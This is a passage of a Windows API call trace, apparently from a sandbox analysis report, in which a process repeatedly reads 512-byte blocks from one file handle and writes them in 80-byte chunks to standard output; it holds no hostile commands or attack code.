lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.921] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.921] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.922] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.922] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, 
lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: 
lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.923] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.923] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.924] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.924] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] 
GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 
[0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.925] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.925] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.926] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.926] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType 
(hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.927] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.927] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.927] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, 
